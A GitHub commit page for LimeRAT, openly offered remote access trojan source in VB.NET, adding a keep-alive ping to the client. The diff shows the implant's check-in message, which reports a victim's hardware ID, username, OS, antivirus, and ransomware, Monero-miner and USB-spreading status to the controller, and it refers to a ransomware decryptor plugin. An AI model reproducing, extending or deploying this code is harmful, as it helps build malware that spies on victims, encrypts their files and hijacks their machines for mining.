Skip to content

Commit

Permalink
UPDATE v0.8.1.4A
Browse files Browse the repository at this point in the history
-Added keep alive ping
  • Loading branch information
Nyrotication committed Sep 22, 2018
1 parent 4c1ef6d commit dffe2b7
Show file tree
Hide file tree
Showing 12 changed files with 2,256 additions and 3,129 deletions.
Binary file modified .vs/LimeRAT/DesignTimeBuild/.dtbcache
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/.suo
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/Server/sqlite3/storage.ide
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/Server/sqlite3/storage.ide-shm
Binary file not shown.
Binary file modified .vs/LimeRAT/v15/Server/sqlite3/storage.ide-wal
Binary file not shown.
2 changes: 1 addition & 1 deletion Project/Client/C_Main.vb
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
'##################################################################
'## N Y A N C A T ||| Updated on Sept/17/2018 ##
'## N Y A N C A T ||| Updated on Sept/22/2018 ##
'##################################################################
'## ##
'## ##
Expand Down
5 changes: 4 additions & 1 deletion Project/Client/C_TcpClient.vb
Original file line number Diff line number Diff line change
Expand Up @@ -108,7 +108,7 @@ re:
Alive = True
MS = New IO.MemoryStream

Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.8.4", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
Send(String.Concat("info", SPL, C_ID.HWID, SPL, C_ID.UserName, SPL, "v0.1.8.4A", SPL, C_ID.MyOS, " ", C_ID.Bit, SPL,
C_ID.INDATE, SPL, C_ID.AV, SPL, C_ID.Rans, SPL, C_ID.XMR, SPL, C_ID.USBSP, SPL, "...", SPL, " ", SPL,
C_ID.Privileges.ToString, SPL, C_Settings.fullpath, SPL, Environment.ProcessorCount))

Expand Down Expand Up @@ -144,6 +144,7 @@ re:
Public Shared P_Stop As Boolean = False
Public Shared P_Start As Boolean = False
Public Shared i As Integer = 0
Public Shared KAP As Integer = 0
Public Shared Sub PING()
Try
If P_Start Then
Expand All @@ -154,6 +155,8 @@ re:
i = 0
End If
End If

KAP += 1 : If KAP > 3000 Then KAP = 0 : Send("KA")
Catch : End Try
End Sub

Expand Down
Binary file modified Project/Plugins/ENC/Resources/DECF.exe
Binary file not shown.
2 changes: 1 addition & 1 deletion Project/Server/Classes/S_Settings.vb
Original file line number Diff line number Diff line change
Expand Up @@ -3,7 +3,7 @@
Public Shared PORT As Integer
Public Shared EncryptionKey As String
Public Shared IP As String = String.Empty
Public Shared StubVer As String = "v0.1.8.4"
Public Shared StubVer As String = "v0.1.8.4A"
Public Shared SPL As String = "|'L'|"
Public Shared ENDOF As String = "|'N'|"

Expand Down
4 changes: 2 additions & 2 deletions Project/Server/Forms/About.Designer.vb

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

5,370 changes: 2,247 additions & 3,123 deletions Project/Server/Forms/About.resx

Large diffs are not rendered by default.

2 changes: 1 addition & 1 deletion Project/Server/Forms/Main.vb
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
'##################################################################
'## N Y A N C A T ||| Updated on Sept/17/2018 ##
'## N Y A N C A T ||| Updated on Sept/22/2018 ##
'##################################################################
'## ##
'## ##
Expand Down

0 comments on commit dffe2b7

Please sign in to comment.